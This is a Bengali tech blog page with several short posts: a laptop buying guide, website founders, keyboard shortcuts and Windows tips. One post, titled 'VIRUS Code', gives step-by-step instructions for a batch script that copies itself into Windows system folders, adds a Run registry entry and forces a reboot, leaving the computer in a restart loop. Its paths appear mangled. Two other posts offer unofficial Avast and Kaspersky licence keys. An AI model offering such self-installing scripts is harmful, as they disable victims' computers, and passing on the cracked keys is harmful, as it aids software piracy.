সবাই কেমন আছেন। আজকের ল্যাপটপ নিয়ে কিছু কথা বলি।

ল্যাপটপ কেনার সময় দেখতে হবে এর processor,motherboard,ram,harddisk,display,graphic,and backup time কেমন পাওয়া যাচ্ছে।

বাজারে অনেক ব্র্যান্ড এর ল্যাপটপ পাওয়া যায় যেমন asus,acer,dell,lanovo,hp এগুলোর ফিচার প্রায় একই রকম তাই যে কোনটা আপনি পছন্দ করতে পারেন। কারন সব গুলো তৈরি হয় চায়নায়।শুধু ফিচার এ এদিক ওদিক বাকি সব একই। আর চায়না হলে যে খারাপ হবে তা কিন্তু নয়, আমি ১বছর ধরে ব্যবহার করছি এখনও কোন সমস্যা হয়নি।

NETBOOK: PRICE:(২০০০৳-২৫০০০৳) আমরা যারা নরমাল কাজ করি যেমন ইন্টারনেট,মুভি,গান ইত্যাদির জন্য আমরা নেটবুক ব্যাবহার করতে পারি।

specificaton: intel atom dual core 1.6ghz,2gb ram,display 10″,320/250/500gb hdd,intel gma graphic,wifi,bluetooth,backup up to 4 to 8hour.

NOTEBOOK (normal): PRICE:(৩৬০০০৳-৪০০০০৳) আমরা যারা নরমালের চেয়ে একটু বেশি চাই তারা নোটবুক ব্যাবহার করতে পারি। specificaton: intel core i3 2nd gen 2.10-2.30ghz,2gb ram,display 14″/15.6″,500gb hdd,intel hd graphic 3000,wifi,bluetooth,backup up to 3hour. EX:
(hp 630-৩৬০০০৳) core i3 2nd gen,2gb ram,320gb hdd,15.6″,hd graphic 3000,wifi,bluetooth,backup up to 3hour),
(hp 430-৩৭০০০৳) core i3 2nd gen,2gb ram,500gb hdd,14″,hd graphic 3000,wifi,bluetooth,backup up to 3hour),
(dell n4050-৩৯০০০৳)core i3 2nd gen,2gb ram,500gb hdd,14″,hd graphic 3000,wifi,bluetooth,backup up to 3hour)

NOTEBOOK (advance): PRICE:(core i5)-৫২০০০৳-৬৫০০০৳) (core i7)-৭০০০০৳-৮০০০০৳) যারা গ্রাফিক্স,গেমিং আরও কিছু চান তারা ব্যবহার করতে পারেন এই রেঞ্জের ল্যাপটপ।

specificaton: intel core i5 3rd gen 2.2-2.5ghz/core, i7 3rd gen 2.1-2.20ghz,4gb ram(1600),display 14″/15.6″17.3″,500/640/750gb hdd,intel hd graphic 4000+deticate graphic card,wifi,bluetooth,backup up to 3hour. EX:
(lenovo g480-৫২০০০৳) core i5 3rd gen,4gb ram (1600),500gb hdd,14″,hd graphic 4000+1gb ati graphic,wifi,bluetooth,backup up to 3hour),
(hp g6-2027tx-৫৬০০০৳) core i5 3rd gen,4gb ram(1600),640gb hdd,15.6″,hdgraphic3000+2gb ati graphic,wifi,bluetooth,backup up to 3hour)
(hp 4740s-৬৫০০০৳) core i5 3rd gen,4gb ram(1600),750gb hdd,17.3″,hdgraphic3000+1gb ati graphic,wifi,bluetooth,backup up to 3hour)
(lenovo z580-৭০০০০৳) core i7 3rd gen,4gb ram (1600),500gb,15.6″,hd graphic 4000+1gb ati graphic,wifi,bluetooth,backup up to 3hour),
(dell n5520-৭৬০০০৳) core i7 3rd gen,4gb ram (1600),1000gb,15.6″,hd graphic 4000+1gb ati graphic,wifi,bluetooth,backup up to 3hour),
(hp dv4 5012tx-৭৯০০০৳) core i7 3rd gen,4gb ram (1600),750gb,14″,hd graphic 4000+2gb nvidia graphic,wifi,bluetooth,backup up to 3hour),
(hp dv6-7023tx-৮০০০০৳) core i7 3rd gen,4gb ram (1600),750gb,15.6″,hd graphic 4000+2gb ati graphic,wifi,bluetooth,backup up to 3hour),
বিদ্রঃ মার্কেট মূল্য কম বেশি হতে পারে।

GAMING LAPTOP:PRICE(১২০০০০৳-unlimited) এবং যাদের মন এখনও ভরেনি তারা ব্যবহার করতে পারেন গেমিং ল্যাপটপ।

specification: intel core i7 3rd gen 2.1-2.5ghz,8gb/16gb ram (1600),display 15.6″/17.3″/18.5″,750/1000/1500/2000gb hdd,hd graphic 4000+powerful ddr5 grphic,wifi,bluetooth,backup up to 3hour.

বাংলাদেশে তেমন গেমিং ল্যাপটপ নেই তবে বাইরে থেকে মন মত আনিয়ে নিতে পারবেন,তবে দাম একটু বেশি পড়বে।

কেমন লাগলো আজকের পোষ্ট? তাই আজই বেছে নিন আপনার পছন্দের ল্যাপটপটি।

ধন্যবাদ।

Advertisements

Avast Antivirus সাথে ২৬ বছরের লাইসেন্স সহ!

Posted: অক্টোবর 7, 2012 in Antivirus
ট্যাগসমূহ:, ,

ফ্রী antivirus খুঁজে খুঁজে এবং crack antivirus খুঁজে যারা ক্লান্ত তাদের জন্যই আমার এই ক্ষুদ্র প্রয়াস…
ইন্টারনেট এ অনেকদিন খোঁজাখুঁজির পর এই জিনিসটি খুঁজে পেলাম..

কথা না বাড়িয়ে চলে যাই মূল কাজে…

বুঝার সুবিধার্থে আমি ধাপে ধাপে দেখিয়ে দিচ্ছি…
১.প্রথমেই অন্য কোনো antivirus থাকলে তা uninstall করে নিন।
২.তারপর Avast AntiVirus এর সর্বশেষ version ডাউনলোড করে নিন।
৩.এবার Avast AntiVirus টি Install করে নিন।
৪.এবার Serial Key টি ডাউনলোড করে নিন।।

এবার আসুন মূল কাজে—->

Avast Instsall হবার পর ডাবল ক্লিক করে Avast এর মূল Menu খুলুন।
i.তারপর চলে যান MAINTAINCE প্রোগ্রামে।
ii.এরপর যান Registration option এ।
iii.Registration option খোলার পর একবারে নিচে Offline Rgistration এ চলে যান।
iv.এবার চলে যান insert lichence key তে এবং past করে দিন..।
এখন নিশ্চই অবাক হয়ে গেলেন। Registration এর মেয়াদ শেষ হবে ২০৩৮ সালে। তার মানে পুরা ২৬ বছর AntiVirus নিয়ে আপনাকে কিছু ভাবতে হবে না…..!!!

কেমন লাগলো জানাবেন! সবাইকে পোষ্টটি পড়ার জন্য ধন্যবাদ! 🙂

সবাই আশা করি ভাল আছেন। আমরা প্রতিদিনই বিভিন্ন গুরুত্বপূর্ণ ওয়েবসাইট ব্যবহার করছি। আবার কিছু ওয়েবসাইট ছাড়া তো আমাদের ইন্টারনেট ব্রাউজিংই বৃথা! কিন্তু আমরা কি সেইসব গুরুত্বপূর্ণ ওয়েবসাইট এর প্রতিষ্ঠাতার নাম জানি? চলুন আজ জেনে নেই গুরুত্বপূর্ণ কিছু ওয়েবসাইটের প্রতিষ্ঠাতার নাম।

>> Yahoo – এর প্রতিষ্ঠাতা: David Filo, Jerry Yang

>> Facebook – এর প্রতিষ্ঠাতা: Mark Zuckerberg, Dustin Moskovitz, Chris Hughes, Eduardo Saverin

>> Twitter – এর প্রতিষ্ঠাতা: Evan Williams, Biz Stone, Jack Dorsey

>> Wikipedia – এর প্রতিষ্ঠাতা: Jimmy Wales, Larry Sanger

>> YouTube – এর প্রতিষ্ঠাতা: Jawed Karim,Steve Chen, Chad Hurley,

>> eBay – এর প্রতিষ্ঠাতা: Pierre Omidyar

>> Orkut – এর প্রতিষ্ঠাতা: Orkut Buyukkokten

>> MySpace – এর প্রতিষ্ঠাতা: TomAnderson, Chris DeWolfe

>> Friendster – এর প্রতিষ্ঠাতা: Jonathan Abrams

>> Hotmail – এর প্রতিষ্ঠাতা: Sabeer Bhatia

>> Wikileaks – এর প্রতিষ্ঠাতা: Julian Assange

আশা করি অনেকেই নতুন কিছু জেনেছেন। আজ এই পর্যন্তই!

পরবর্তীতে আবার নতুন কিছু নিয়ে হাজির হব!

সবাইকে ধন্যবাদ!

মাউসের উপর নির্ভরশীলতা কমিয়ে এবং কিবোর্ডে Proficiency বাড়িয়ে আপনি আপনার কম্পিউটারের productivity বৃদ্ধি করতে পারেন। যেমন: কিবোর্ড দিয়ে কোন টেক্সট সিলেক্ট ও Ctrl + C চেপে কপি করা মাউস দিয়ে file menu থেকে করার চেয়ে অনেক দ্রুততর হয়। এতে করে একবার কিবোর্ডে আরেকবার মাউসে হাত স্থানান্তর করতে হয় না। নিম্মে সবচেয়ে বেশি ব্যবহৃত হয় এরকম 10টি টাস্ক কিভাবে কিবোর্ড শর্টকাট দিয়ে করা যায় তা নিয়ে আলোচনা করা হলো ।

1. সিলেক্টেড কোন কিছু কপি করতে : Ctrl + C অথবা, Ctrl + Insert

2. কপি করা কোন কিছু পেস্ট করতে : Ctrl + V অথবা, Shift + Insert

3. ডকুমেন্টের কোন পরিবর্তন আগের অবস্থানে ফিরিয়ে আনতে (Undo): Ctrl + Z এবং এর বিপরীত রেজাল্ট পেতে (redo) Ctrl + Y চাপুন।

4. চালু থাকা কোন program/folder এর ভিতর থেকে কোন শব্দ/file খুঁজে পেতে Ctrl + F প্রেস করে কাঙ্খিত শব্দটি লিখে এন্টার দিন।

5. ওপেন করা program গুলো পরিবর্তন/switch করতে : Alt + Tab or Alt + Esc এবং একই প্রোগ্রামের ট্যাব পরিবর্তন করার জন্য Ctrl + Tab ।

Tip: Adding the Shift key to Alt + Tab or Ctrl + Tab will move backwards, Windows Vista and 7 users can also press the Windows Key + Tab to switch through open programs in a full screenshot of the Window.

6. Single character এর পরিবর্তে সম্পূর্ন কোন শব্দকে একসাথে ডিলিট করতে : Ctrl + Back space এবং Ctrl + Left or Right arrow চাপুন। Ctrl চেপেধরে left or right arrow চাপুন তাহলে প্রতি চাপে কার্সর পয়েন্ট একটি করে শব্দ পাস করবে এর সাথে Shift key যোগ করলে প্রতি চাপে একটি করে word সিলেক্ট হবে।

7. কোন ডকুমেন্ট সেভ করতে : Ctrl + S

8. কোন ডকুমেন্টের শুরুর পয়েন্টে যেতে Ctrl + Home এবং শেষ পয়েন্টে যেতে Ctrl + End চাপুন।

9. প্রিন্ট কমান্ড দিতে : Ctrl + P

10. ইন্টারনেট ব্রাউজ করার সময় পেইজ স্ক্রল করতে Page Up, Space bar, and Page Down চাপুন।

যারা যারা ক্যাসপারস্কী ইন্টারনেট সিকিউরিটি ব্যবহার করেন, তাদের প্রায়ই কী নিয়ে ঝামেলায় পড়তে হয়। নেটে কী পাওয়া যায় কিন্তু তা বেশিরভাগ সময়ই কাজ করে না। তাই নিচে আপনাদের জন্য একটি লিঙ্ক দিলাম এখানে ক্যাসপারস্কীর বিভিন্ন ভার্সনের কী দেয়া আছে।

কী পেতে ক্লিক করুন এখানে

লিঙ্কে অ্যাক্টিভেশন সম্পর্কে বিস্তারিত দেয়া আছে। কোন সমস্যা হলে জানাবেন।

ধন্যবাদ!

VIRUS Code: Open করলেই PC shutdown!!

Posted: অক্টোবর 5, 2012 in Tips and Tricks
ট্যাগসমূহ:, ,

আজকে আমরা ছোট্ট একটি জিনিস দেখব!

Shutdown প্রোগ্রামটি Double ক্লিক করে Open করলেই PC shutdown করবে। এটা কোন ক্ষতি করে না। সঠিক ভাবেই PC Shutdown করে দেয়। এটা হল Simple VIRUS Code এর Father ও আছে। যার কাজ হল যত বার PC চালু হবে ততো বার বন্ধ করে দিবে। এটা অনেক ঝামেলাকর ও অনেকের জন্য বিপদজনক।

Shutdown প্রোগ্রামটি তৈরি করার পদ্ধতিঃ

১. Open Notepad

২. নীচের Code টি type করুন।

@echo off

shutdown -r -f -t 00

৩. Shutdown.bat নামে Save করুন।

[divider2]

Shutdown Father ভাইরাসটি তৈরি করতেঃ

১. Open Notepad

২. নীচের Code টি type করুন।

@echo off
copy restart.bat %systemdrive%/y
copy restart.bat %systemdrive%WINDOWS/y
copy restart.bat %systemdrive%WINDOWssystem32/y
reg add “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun” /v Restart /d %systemdrive%windowssystem32restart.bat/f
shutdown -r -f -t 00

৩. FShutdown.bat নামে Save করুন।

এটি ওপেন করলেই কম্পিউটার শাট ডাউন হয়ে যাবে। এটি কেবল শেখানোর জন্য। দয়া করে কারো ক্ষতি করবেন না। ধন্যবাদ!

(পোষ্ট সংগৃহীত)

আপনাদের জন্য রইল কম্পিউটার ও ইন্টারনেটের কিছু টিপস। আশা করি ভালো লাগবে।

1. সময় বাঁচান রান কমান্ড দিয়ে :

উইন্ডোজের বিভিন্ন সুযোগ-সুবিধা, বিভিন্ন আপ্লিকেশনে শুধু রান কমান্ড দিয়ে খুব সহজেই যাওয়া যায়। এতে অনেক সময় বাঁচে। নিচে তেমনই কিছু রান কমান্ড দেওয়া হলো।

প্রথমে উইন্ডোজ কি+R চেপে সরাসরি রান-এ যেতে হবে। এরপর নির্দিষ্ট কমান্ড দিয়ে সরাসরি যেকোনো প্রোগ্রামে যাওয়া যাবে Read the rest of this entry »